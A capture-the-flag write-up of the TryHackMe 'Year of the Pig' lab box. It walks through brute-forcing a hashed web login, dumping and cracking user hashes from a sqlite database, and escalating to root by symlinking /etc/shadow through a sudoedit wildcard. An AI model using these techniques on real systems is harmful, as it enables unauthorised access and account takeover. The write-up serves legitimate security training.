WriteUp — THM Year of the Pig

Some pigs fly, and some have stories to tell. Get going!

This is a writeup for TryHackMe room Year of the Pig.

Photo by Christopher Carson on Unsplash

Reconnaissance

Let’s start by doing a nmap scan to see which ports are open:

nmap -sC -sV -p- 10.10.15.32  
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-02 19:28 EET
Nmap scan report for 10.10.15.32
Host is up (0.057s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Marco's Blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ok, a pretty clear signal to start by enumerating the web server. It’s a simple site so let’s dig deeper.

Enumerating the server directories reveals an admin page at /login.php:

Gaining access

The page is pretty interesting. There is cryptic JavaScript that sends a JSON payload in a POST request to http://10.10.15.32/api/login in the format:

{"username":"admin","password":"3858f62230ac3c915f300c664312c63f"}

The password value is md5 hash of the password string. After a failed login we get a password hint:

Remember that passwords should be a memorable word, followed by two numbers and a special character.

This should be enough to craft a dictionary attack. I don’t think hydra supports this kind of authentication so maybe a custom Python script might be good? I could generate passwords with John and feed them to my script. I make a simple rule and add it to /etc/john/john.jonf:

[List.Rules:PigRule]
Az"[0-9][0-9][!?#$%&/()=]"

I harvest the website for “memorable words”:

Marco
marco
plane
planes
airplane
airplanes
airforce
flying
Savoia
savoia
Macchi
macchi
Curtiss
curtiss
milan
Milan
mechanic
maintenance
Italian
italian
Agility
agility

I then make a Python script to test out the passwords:

And generate passwords based on my rule and try them out:

john --wordlist=words -rules:PigRule -stdout | python3 auth.py http://10.10.15.32 marco

After quite a while I finally get the password __REDACTED__ and can login to the website. Could have narrowed the wordlist down further. There is a page to enter commands to the system but a lot of what I tried didn’t work. whoami works and it reveals the website is running as www-data. So I tried to login with SSH and the same credentials and I got in and the first flag!

Privilege escalation

First check sudo since I know the password. But no sudo rights. I do a quick enumeration at home directories and there is a flag2.txt in /home/curtis but I cannot read it. Maybe I first need to escalate to curtis and then escalate further as him. This hints to sudo rights for him so I check them out:

cat /etc/sudoers.d/curtis 
curtis ALL=(ALL:ALL) sudoedit /var/www/html/*/*/config.php

Now I need to figure how to login as curtis. I check the portal and there is an option to reset his password:

I do it and try to login with su but it doesn’t work. Neither does ssh.

I do a linPEAS enumeration but don’t find any PE vectors. So time to look at the website.

I enumerate /var/www and notice that the web app uses a REST API which stores data in a sqlite3 database:

marco@year-of-the-pig:/var/www$ ls -la
total 36
drwxr-xr-x 3 www-data web-developers 4096 Nov 2 19:22 .
drwxr-xr-x 13 root root 4096 Aug 22 00:02 ..
-rw — — — — 1 www-data www-data 24576 Nov 2 19:22 admin.db
drwxrwxr-x 7 www-data web-developers 4096 Aug 21 23:57 html

Maybe I could get this file somehow using the commands from the web site since it’s running as www-data. But since I reset the password for curtis I have to reset the box before proceeding. Luckily the password for marco wasn’t dynamically generated so I didn’t have to attack it again!

I have to take a closer look at how commands are executed since most of them didn’t work. Let’s take a look at commands.php:

Ok, LOL. No wonder most commands didn’t work. But since I can write to the file let’s add another command:

Now we can dump the users:

marco@year-of-the-pig:/var/www$ sqlite3 admin.db 
SQLite version 3.22.0 2018-01-22 18:45:57
Enter ".help" for usage hints.
sqlite> select * from users;
58a2f366b1fd51e127a47da03afc9995|marco|ea22b622ba9b3c41b22785dcb40211ac
f64ccfff6f64d57b121a85f9385cf256|curtis|a80bfe309eca.....1ea6cb3677971f2

Use crackstation.net to crack the hash: __REDACTED__ Try to login with SSH. Doesn’t work. But su — curtis does.

Let’s now look at that sudo again. We can edit some files. Quick googling reveals an exploit: https://www.exploit-db.com/exploits/37710

I tweak my awesome command to also chmod everyone all rights to /var/www and create /foo/bar directories under it. Then I link /etc/shadow to be config.php:

ln -s /etc/shadow config.php

Then I can edit the file with the sudo command. Initially I thought to crack the hash with John, but why not just change the password?

openssl passwd -6 -salt xyz hackerftw
$6$xyz$O5zokcxlIfqJROMbd7RNFPqU8xGaJQhEHueCQ8NdrTQOtNDuB9OjzgLk6L2GiXdpeqxea3cy/F9RAZoW3OW4G0

sudoedit the linked file and BOOM!